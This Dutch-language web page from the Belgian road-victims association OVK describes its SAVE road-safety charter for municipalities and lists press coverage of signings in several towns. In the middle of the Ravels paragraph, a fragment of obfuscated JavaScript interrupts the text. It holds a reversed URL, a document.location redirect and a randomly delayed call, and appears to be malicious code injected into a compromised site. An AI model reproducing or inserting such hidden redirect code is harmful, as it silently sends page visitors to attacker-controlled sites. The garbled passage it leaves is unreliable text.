Met het SAVE-Charter Steden & Gemeenten wil de vzw Ouders van Verongelukte Kinderen (OVK) de Belgische steden en gemeenten betrekken bij haar strijd tegen de (nog steeds) te grote verkeersonveiligheid in ons land.

Op deze website vindt u meer informatie over het SAVE-charter. Daarnaast is er ook verdere informatie terug te vinden over OVK en haar werking.

SAVE-charter in de media

De voorbije maanden in het SAVE-charter Steden & Gemeenten verschillende keren in de media geweest. Telkens een gemeente het charter ondertekent komt dit ook uitgebreid aan bod in de (lokale) pers.

In Riemst heeft de lokale zender TV Limburg een reportage gemaakt over de ondertekening en verscheen er een artikel in de digitale krant van Het Belang van Limburg.

Over de ondertekening in Heusden-Zolder verscheen er een artikel op de Internetgazet Heusden-Zolder.eu.

De gemeente Bredene was de eerste West-Vlaamse gemeente die het SAVE-charter ondertekende. Het artikel dat verscheen over deze ondertekening kan hier teruggevonden worden.

In Laarne werd het SAVE-charter ondertekend tijdens het slotmoment van de actie ‘Met Belgrinkel naar de winkel’. Hierover verscheen volgend artikel.

Naast de persaandacht voor de ondertekeningen was er ook aandacht in de gemeente Ravels voor het SAVE-charter. Naar aanleiding van de duidelijkere communicatie over de snelheidscontroles die de politiezone houdt dit artikel. Dit toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toont aan dat de deelnemende gemeenten effectief de acties uit het actieplan verkeersveiligheid opnemen en uitvoeren.


© 2012 O.V.K. vzw - Léon Theodorstraat 85, 1090 Brussel - Tel: 02/427.75.00 - info@ovk.be